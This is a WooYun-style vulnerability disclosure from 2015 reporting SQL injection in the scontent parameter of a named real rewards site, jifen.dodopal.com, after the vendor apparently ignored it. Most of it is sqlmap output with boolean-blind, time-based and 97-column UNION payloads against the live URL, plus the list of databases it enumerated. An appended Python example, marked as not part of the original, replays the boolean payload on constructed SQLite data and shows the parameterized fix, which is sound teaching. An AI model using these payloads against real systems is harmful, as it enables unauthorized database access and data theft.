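2015-12-18: Details reported to the vendor; awaiting the vendor's response.
2015-12-23: The vendor actively ignored the vulnerability; details disclosed to the public.
Sitting back and waiting for it to be ignored.
http://jifen.dodopal.com/index.php/rewards-so_showlist-1.html?scontent=*
The scontent parameter is injectable.
DBA privileges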
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 266 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: http://jifen.dodopal.com:80/index.php/rewards-so_showlist-1.html?scontent=' AND 3325=3325 AND 'olxi' LIKE 'olxi Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://jifen.dodopal.com:80/index.php/rewards-so_showlist-1.html?scontent=' AND (SELECT * FROM (SELECT(SLEEP(5)))aYOr) AND 'SjRO' LIKE 'SjRO Type: UNION query Title: Generic UNION query (NULL) - 97 columns Payload: http://jifen.dodopal.com:80/index.php/rewards-so_showlist-1.html?scontent=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a7a6271,0x4c52597876594f536443,0x71626b7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-----[00:21:56] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.3.28back-end DBMS: MySQL 5.0.12[00:21:56] [INFO] fetching database namesavailable databases [8]:[*] dodobao[*] information_schema[*] integral[*] mysql[*] performance_schema[*] test[*] wxdodopal[*] wxdodopalwe7[00:21:56] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\jifen.dodopal.com'[*] shutting down at 00:21:56
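Why the boolean-based payload above changes the query, and what the fix looks like, as an added example that is not part of the original report and not the vendor's code. Assumptions: the search behind scontent is modelled as a LIKE query, the table and column names are hypothetical, the rows are constructed, and an in-memory SQLite database stands in for the site's MySQL back end.

```python
import sqlite3

# Boolean-based blind payload exactly as sqlmap reported it on this page.
PAGE_PAYLOAD = "' AND 3325=3325 AND 'olxi' LIKE 'olxi"


def make_db():
    """Constructed sample data; table and column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE rewards (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany(
        "INSERT INTO rewards (title) VALUES (?)",
        [("bus card top-up",), ("movie ticket",), ("gift card",)],
    )
    return db


def search_vulnerable(db, scontent):
    """Concatenates scontent into the SQL text, so its quotes become syntax."""
    sql = "SELECT title FROM rewards WHERE title LIKE '%" + scontent + "%'"
    return [row[0] for row in db.execute(sql)]


def search_safe(db, scontent):
    """Binds scontent as data and escapes LIKE wildcards inside it."""
    escaped = (
        scontent.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    )
    sql = "SELECT title FROM rewards WHERE title LIKE ? ESCAPE '\\'"
    return [row[0] for row in db.execute(sql, ("%" + escaped + "%",))]


def compare(scontent):
    """Returns (vulnerable_result, safe_result) for one search term."""
    db = make_db()
    return search_vulnerable(db, scontent), search_safe(db, scontent)


if __name__ == "__main__":
    for term in ("card", PAGE_PAYLOAD):
        vulnerable, safe = compare(term)
        print(repr(term))
        print("  concatenated :", vulnerable)
        print("  parameterized:", safe)
```

With the concatenated query the payload closes the string literal and the appended conditions are evaluated as SQL, so every row comes back; with a bound parameter the same input is only a search term that matches nothing.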
Heh.
Severity: no impact (ignored by vendor)
Ignored at: 2015-12-23 01:10
Vulnerability Rank: 4 (WooYun rating)
None yet.